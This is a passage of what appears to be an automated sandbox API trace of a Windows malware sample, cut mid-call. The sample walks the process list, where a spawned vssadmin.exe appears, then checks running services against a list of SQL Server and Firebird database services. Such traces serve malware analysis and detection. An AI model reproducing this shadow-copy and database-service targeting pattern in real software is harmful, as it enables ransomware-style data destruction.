lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0048.065] lstrlenW (lpString="services.exe") returned 12 [0048.065] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0048.066] lstrlenW (lpString="lsass.exe") returned 9 [0048.066] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0048.067] lstrlenW (lpString="lsm.exe") returned 7 [0048.067] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.067] lstrlenW (lpString="svchost.exe") returned 11 [0048.067] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.068] lstrlenW (lpString="svchost.exe") returned 11 [0048.068] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.069] lstrlenW (lpString="svchost.exe") returned 11 [0048.069] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.069] lstrlenW (lpString="svchost.exe") returned 11 [0048.069] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.070] lstrlenW (lpString="svchost.exe") returned 11 [0048.070] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0048.070] lstrlenW (lpString="audiodg.exe") returned 11 [0048.071] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.071] lstrlenW (lpString="svchost.exe") returned 11 [0048.071] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.072] lstrlenW (lpString="svchost.exe") returned 11 [0048.072] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0048.073] lstrlenW (lpString="dwm.exe") returned 7 [0048.073] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0048.073] lstrlenW (lpString="explorer.exe") returned 12 [0048.073] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0048.074] lstrlenW (lpString="spoolsv.exe") returned 11 [0048.074] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0048.075] lstrlenW (lpString="taskhost.exe") returned 12 [0048.075] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.075] lstrlenW (lpString="svchost.exe") returned 11 [0048.075] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0048.076] lstrlenW (lpString="taskeng.exe") returned 11 [0048.076] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0048.077] lstrlenW (lpString="taskhost.exe") returned 12 [0048.077] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0048.077] lstrlenW (lpString="entrepreneur.exe") returned 16 [0048.077] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0048.078] lstrlenW (lpString="andrew kinds.exe") returned 16 [0048.078] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0048.079] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0048.079] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0048.079] lstrlenW (lpString="educated.exe") returned 12 [0048.079] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0048.080] lstrlenW (lpString="servers.exe") returned 11 [0048.080] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0048.081] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0048.081] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0048.081] lstrlenW (lpString="gbp_chair.exe") returned 13 [0048.081] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0048.082] lstrlenW (lpString="attention infected.exe") returned 22 [0048.082] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0048.083] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0048.083] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0048.083] lstrlenW (lpString="pattern amateur.exe") returned 19 [0048.083] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0048.532] lstrlenW (lpString="referral.exe") returned 12 [0048.533] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0048.702] lstrlenW (lpString="copyingseems.exe") returned 16 [0048.702] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0048.703] lstrlenW (lpString="spin generally.exe") returned 18 [0048.703] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0048.704] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0048.704] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0048.705] lstrlenW (lpString="transmit.exe") returned 12 [0048.705] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0048.705] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0048.705] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0048.706] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0048.706] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0048.707] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0048.707] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0048.707] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0048.707] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0048.708] lstrlenW (lpString="delight.exe") returned 11 [0048.708] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0048.709] lstrlenW (lpString="within enquiry.exe") returned 18 [0048.709] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0048.709] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0048.709] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0048.710] lstrlenW (lpString="agent1c.exe") returned 11 [0048.710] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0048.711] lstrlenW (lpString="cmd.exe") returned 7 [0048.711] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0048.711] lstrlenW (lpString="conhost.exe") returned 11 [0048.711] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0048.712] lstrlenW (lpString="vssadmin.exe") returned 12 [0048.712] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0048.713] lstrlenW (lpString="VSSVC.exe") returned 9 [0048.713] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0048.713] lstrlenW (lpString="svchost.exe") returned 11 [0048.713] Process32NextW (in: hSnapshot=0x16c, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0048.714] CloseHandle (hObject=0x16c) returned 1 [0048.714] Sleep (dwMilliseconds=0x1f4) [0049.750] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x37203d0 [0049.750] EnumServicesStatusExW (in: hSCManager=0x37203d0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0049.750] GetLastError () returned 0xea [0049.750] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12c6) returned 0x3800fb0 [0049.750] EnumServicesStatusExW (in: hSCManager=0x37203d0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3800fb0, cbBufSize=0x12c6, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3800fb0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0049.751] CloseServiceHandle (hSCObject=0x37203d0) returned 1 [0049.751] lstrlenW (lpString="Appinfo") returned 7 [0049.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0049.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0049.751] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0049.751] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0049.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0049.751] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0049.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0049.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0049.751] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0049.751] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0049.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0049.751] lstrlenW (lpString="AudioSrv") returned 8 [0049.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0049.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0049.752] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0049.752] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0049.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0049.752] lstrlenW (lpString="BFE") returned 3 [0049.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0049.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0049.752] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0049.752] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0049.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0049.752] lstrlenW (lpString="CryptSvc") returned 8 [0049.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0049.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0049.752] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0049.752] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0049.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0049.752] lstrlenW (lpString="CscService") returned 10 [0049.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0049.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0049.752] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0049.752] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0049.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0049.752] lstrlenW (lpString="DcomLaunch") returned 10 [0049.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0049.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0049.752] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0049.752] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0049.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0049.752] lstrlenW (lpString="Dhcp") returned 4 [0049.752] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0049.752] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0049.752] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0049.752] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0049.752] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0049.753] lstrlenW (lpString="Dnscache") returned 8 [0049.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0049.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0049.753] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0049.753] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0049.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0049.753] lstrlenW (lpString="DPS") returned 3 [0049.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0049.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0049.753] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0049.753] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0049.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0049.753] lstrlenW (lpString="eventlog") returned 8 [0049.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0049.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0049.753] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0049.753] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0049.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0049.753] lstrlenW (lpString="EventSystem") returned 11 [0049.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0049.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0049.753] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0049.753] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0049.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0049.753] lstrlenW (lpString="gpsvc") returned 5 [0049.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0049.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0049.753] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0049.753] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0049.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0049.753] lstrlenW (lpString="iphlpsvc") returned 8 [0049.753] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0049.753] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0049.753] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0049.753] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0049.753] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0049.754] lstrlenW (lpString="LanmanServer") returned 12 [0049.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0049.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0049.754] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0049.754] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0049.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0049.754] lstrlenW (lpString="LanmanWorkstation") returned 17 [0049.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0049.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0049.754] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0049.754] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0049.754] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0049.754] lstrlenW (lpString="lmhosts") returned 7 [0049.754] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0049.754] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0049.754] lstrcmpiW 